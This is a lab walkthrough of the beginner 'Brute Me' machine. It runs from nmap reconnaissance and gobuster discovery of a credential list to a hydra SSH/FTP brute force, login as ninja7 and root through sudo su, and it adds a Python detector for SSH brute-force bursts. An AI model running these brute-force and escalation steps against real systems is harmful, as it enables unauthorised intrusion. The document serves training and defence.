Brute Me Lab Walkthrough
This is a detailed walkthrough of the Brute Me lab from Imran at NixSecura. I'll show how I moved from initial scanning to full root access, including enumeration, brute forcing, and privilege escalation.
Step 1: Reconnaissance with Nmap
First thing I did was run a full scan to see what services are up:
nmap -sV -A 192.168.1.22
Host is up (0.0046s latency).
Not shown: 65531 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
20/tcp closed ftp-data
21/tcp open ftp vsftpd 2.0.8 or later
22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.13
80/tcp open http Apache httpd 2.4.7 ((Ubuntu))
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: e1Pr0f3ss0r's l3g4cy
MAC Address: 24:B2:B9:47:0E:F5
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
We can see:
- FTP running on port 21
- SSH on port 22
- HTTP on port 80
Step 2: Web Enumeration
Visiting http://192.168.1.22 gave me a page titled “e1Pr0f3ss0r's l3g4cy”. Using directory brute forcing (with tools like gobuster), I discovered a file called /creds.disc.
tokyo
berlin
nairobi
rockyou
papel
la-casa
money-heist
nobita
ninja7
ikn0wy0u
don'tbruteme
legacy
crackit
badboy123
anonymous
admin
user123
mr.r0b0t
darlen
travel3r
academy.icorx
b31l@c1a0
caroline
g01df1$h
purple
b3stfr1ends
h3l10fr113nd
D3nv3r
proxy99
This list of credentials looked promising for brute‑forcing FTP/SSH.
Step 3: Brute Forcing SSH & FTP with Hydra
I used hydra to try all combinations. The command was something like:
hydra -L users.txt -P passwords.txt ssh://192.168.1.22
After some attempts, I found a valid login:
login: ninja7
password: caroline
The same credentials also worked for FTP.
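From the defender's side, a password-guessing run like this one appears in the SSH server's auth log as a burst of failed passwords from one source followed by an accepted one. The added example below (not part of the original walkthrough) flags that pattern; the log lines, the source addresses 192.168.1.50 and 192.168.1.77, the user alice and the threshold of 5 are constructed assumptions.

```python
import re
from collections import defaultdict

# Constructed sshd lines in the usual OpenSSH auth.log format (not taken from the lab host).
SAMPLE_LOG = """\
Jan 10 10:00:01 lab sshd[2101]: Failed password for invalid user tokyo from 192.168.1.50 port 40112 ssh2
Jan 10 10:00:02 lab sshd[2102]: Failed password for invalid user berlin from 192.168.1.50 port 40114 ssh2
Jan 10 10:00:03 lab sshd[2103]: Failed password for invalid user admin from 192.168.1.50 port 40116 ssh2
Jan 10 10:00:04 lab sshd[2104]: Failed password for ninja7 from 192.168.1.50 port 40118 ssh2
Jan 10 10:00:05 lab sshd[2105]: Failed password for ninja7 from 192.168.1.50 port 40120 ssh2
Jan 10 10:00:06 lab sshd[2106]: Failed password for ninja7 from 192.168.1.50 port 40122 ssh2
Jan 10 10:00:07 lab sshd[2107]: Accepted password for ninja7 from 192.168.1.50 port 40124 ssh2
Jan 10 11:30:10 lab sshd[2200]: Failed password for alice from 192.168.1.77 port 51000 ssh2
Jan 10 11:30:20 lab sshd[2201]: Accepted password for alice from 192.168.1.77 port 51002 ssh2
"""

EVENT = re.compile(
    r"sshd\[\d+\]: (?P<result>Failed|Accepted) password for "
    r"(?:invalid user )?(?P<user>\S+) from (?P<ip>\S+) port \d+"
)

def find_bruteforce(log_text, threshold=5):
    """Per source IP at or above the failure threshold: failure count,
    distinct usernames tried, and accounts accepted after the burst."""
    failures = defaultdict(int)
    users = defaultdict(set)
    accepted = defaultdict(list)
    for line in log_text.splitlines():
        m = EVENT.search(line)
        if not m:
            continue
        ip, user = m["ip"], m["user"]
        if m["result"] == "Failed":
            failures[ip] += 1
            users[ip].add(user)
        elif failures[ip] >= threshold:
            # A success after many failures suggests a guessed password.
            accepted[ip].append(user)
    return {
        ip: {"failures": n, "users_tried": len(users[ip]), "accepted": accepted[ip]}
        for ip, n in failures.items() if n >= threshold
    }

if __name__ == "__main__":
    for ip, finding in find_bruteforce(SAMPLE_LOG).items():
        print(ip, finding)
```

A single mistyped password followed by a normal login (the alice lines) stays below the threshold and is not reported.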
Step 4: Logging in via SSH
Using:
ssh ninja7@192.168.1.22
Once inside as ninja7, I explored the home directory, collected flags & clues.
Step 5: Privilege Escalation to Root
Next I checked sudo permissions:
sudo -l
It turns out ninja7 had the privilege to run sudo su. Then I used the same password (caroline) to escalate:
sudo su
Then I confirmed root:
whoami
# output: root
Final Thoughts
This lab reinforced some essential lessons:
- Weak or brute-forceable credentials can lead to full compromise.
- Enumerate web-facing services for hidden files or directories.
- Privilege escalation often hides in sudo permissions.
Huge thanks to Imran and NixSecura Services for creating a lab that’s beginner friendly yet educational.